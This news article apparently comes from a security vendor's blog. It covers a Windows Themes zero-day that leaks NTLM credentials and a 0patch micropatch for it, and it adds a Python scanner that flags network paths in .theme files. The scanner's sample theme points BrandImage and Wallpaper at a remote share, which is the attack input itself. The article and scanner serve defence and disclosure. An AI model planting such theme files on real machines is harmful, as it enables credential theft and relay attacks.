A newly identified zero-day vulnerability in Windows Themes files has raised significant concerns regarding the security of users’ NTLM credentials, creating a pathway for potential remote credential theft. Despite Microsoft’s recent attempts to mitigate similar vulnerabilities, a notable security gap persists, enabling attackers to exploit this flaw simply by having a malicious theme file viewed in Windows Explorer. This alarming discovery was reported by researchers at ACROS Security, underscoring the ongoing threats that Windows users face from NTLM-related exploits.
New Bypass Detected by ACROS Security
Initially, Microsoft addressed the issue with a patch for CVE-2024-21320 in January, targeting NTLM leaks. However, Akamai researcher Tomer Peled uncovered that attackers could circumvent this patch, leading to the emergence of CVE-2024-38030. Through this vulnerability, a malicious theme file causes Windows to send network requests that carry the user's NTLM credentials to a remote attacker, without requiring any interaction from the user.
ACROS Security’s findings reveal yet another bypass of Microsoft’s patch that impacts fully updated Windows systems, including Windows 11 24H2. To provide immediate relief, ACROS Security has released a temporary micropatch via their 0patch service, enabling users to safeguard their systems until an official patch is rolled out. This vulnerability affects both legacy and supported versions of Windows Workstation.
How the Zero-Day Attack Works
The mechanism of this zero-day attack involves malicious theme files that incorporate network paths for properties like BrandImage and Wallpaper. When such a file is displayed in Explorer, Windows tries to fetch those resources and, in doing so, authenticates to the remote host with NTLM, sending the user's credentials to it. This NTLM leak is present across multiple Windows versions, from Windows 7 to Windows 11 24H2, and allows attackers to execute NTLM relay and pass-the-hash attacks, facilitating lateral movement within compromised networks. ACROS Security's temporary patch addresses this issue by ensuring that Windows accurately detects network paths within theme files, effectively preventing NTLM leaks.
How the Micropatch Works
In light of the Windows Themes zero-day vulnerability, ACROS Security has introduced a micropatch that effectively halts NTLM credential leaks triggered by malicious theme files. The micropatch specifically targets the network paths that Windows Explorer would otherwise follow, initiating a request to an attacker's machine when a compromised theme file is viewed. By accurately identifying these network paths, the patch blocks the outbound connection, so no NTLM credentials are sent and no illicit connection is established.
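The two sections above describe the same detection idea: a .theme file is a plain INI text file, and the leak happens when a resource property such as BrandImage or Wallpaper points at a network location rather than a local file. The following Python script is an added example written for this article, not code from ACROS Security, 0patch, Microsoft or SOCRadar; it parses a .theme file and reports every property whose value is a UNC path or URL, so a defender can triage theme files (for instance from a mail gateway or a file share) before they are ever rendered in Explorer. The section names [Theme] and [Control Panel\Desktop], the extra keys ImagesRootPath and Path, the TEST-NET address 192.0.2.10 and both sample files are assumptions constructed for this example, not material from the article.

```python
import configparser
import re
from typing import Dict, List, Tuple

# Keys that name image or cursor resources. BrandImage and Wallpaper are the
# properties the article names; ImagesRootPath (slideshow) and Path (cursor
# entries) are assumptions based on the documented .theme INI layout.
RESOURCE_KEYS = {"brandimage", "wallpaper", "imagesrootpath", "path"}

# A value that points off-host: a UNC path (\\host\share), a forward-slash
# UNC, or any URL scheme (http://, https://, file://, ...).
NETWORK_RE = re.compile(r"^\s*(\\\\|//|[a-z][a-z0-9+.\-]*://)", re.IGNORECASE)


def is_network_path(value: str) -> bool:
    """True if fetching this value would make Windows contact another host."""
    return bool(value and NETWORK_RE.match(value))


def parse_theme(text: str) -> List[Tuple[str, str, str]]:
    """Parse .theme text (plain INI) into (section, key, value) triples.

    Only '=' is treated as the key/value separator so that 'C:\\...' values
    are not split at the drive colon; duplicate keys and bare lines are
    tolerated rather than rejected, since a hostile file need not be well formed.
    """
    cp = configparser.RawConfigParser(strict=False, delimiters=("=",),
                                      allow_no_value=True)
    cp.optionxform = str  # keep key case exactly as written in the file
    cp.read_string(text)
    return [(section, key, value if value is not None else "")
            for section in cp.sections()
            for key, value in cp.items(section)]


def scan_theme(text: str) -> List[Dict[str, str]]:
    """Report every property whose value is a network location.

    Every key is checked, not only the known resource keys, so an unexpected
    property carrying a UNC path is still surfaced (with risk 'review').
    """
    findings = []
    for section, key, value in parse_theme(text):
        if is_network_path(value):
            findings.append({
                "section": section,
                "key": key,
                "value": value,
                "risk": "high" if key.lower() in RESOURCE_KEYS else "review",
            })
    return findings


def scan_theme_file(path: str) -> List[Dict[str, str]]:
    """Scan a .theme file on disk; accepts a UTF-16 BOM as well as UTF-8."""
    with open(path, "rb") as fh:
        raw = fh.read()
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        text = raw.decode("utf-16")
    else:
        text = raw.decode("utf-8-sig", errors="replace")
    return scan_theme(text)


# Constructed sample: resource properties pointing at a network share.
# 192.0.2.10 is a documentation (TEST-NET-1) address, not a real host.
SAMPLE_SUSPICIOUS = r"""[Theme]
DisplayName=Constructed sample theme
BrandImage=\\192.0.2.10\share\brand.png

[Control Panel\Desktop]
Wallpaper=\\192.0.2.10\share\wall.jpg
"""

# Constructed sample: the same properties resolving to local files only.
SAMPLE_BENIGN = r"""[Theme]
DisplayName=Constructed benign theme
BrandImage=%SystemRoot%\resources\Themes\aero\brand.png

[Control Panel\Desktop]
Wallpaper=C:\Windows\web\wallpaper\Windows\img0.jpg
"""


if __name__ == "__main__":
    for label, sample in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        findings = scan_theme(sample)
        print(f"{label}: {len(findings)} network reference(s)")
        for f in findings:
            print(f"  [{f['section']}] {f['key']} = {f['value']}  (risk: {f['risk']})")
```

Running the script prints two high-risk findings for the constructed suspicious sample and none for the benign one. The check deliberately flags any off-host reference, not only UNC paths, because the point of the micropatch described above is the same: a theme should never cause Explorer to leave the machine to fetch a resource. In an environment where theme files legitimately live on a trusted file server, add an allow-list of hostnames in front of the risk assignment rather than loosening the pattern.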
A demonstration on YouTube illustrates the vulnerability on two fully updated Windows 11 24H2 computers. The first PC generates a malicious theme file and transfers it to the second, unpatched PC. Merely copying this file to the unpatched PC’s desktop triggers a network connection, sending NTLM credentials to the attacker’s machine without any additional actions required. However, with the 0patch micropatch installed, the same file transfer does not lead to a connection. Instead, the micropatch identifies and blocks the network path within the theme file, safeguarding credentials from compromise. This real-time, targeted patch exemplifies the effectiveness of 0patch’s solution, providing a proactive measure even before Microsoft issues an official fix.
Stay Ahead with SOCRadar’s Vulnerability Intelligence
As new vulnerabilities continue to surface daily, taking proactive measures is essential for securing your organization’s digital landscape. SOCRadar Vulnerability Intelligence equips you with the necessary tools to stay ahead of potential threats. This feature aids in identifying and prioritizing critical vulnerabilities, offering real-time alerts and actionable insights before attackers can exploit them.
The SOCRadar Vulnerability Intelligence Module ensures that your resources are directed toward the most pressing vulnerabilities, facilitating quicker patching and helping maintain robust security. With SOCRadar, you’ll consistently be one step ahead, fortifying your organization against the latest threats.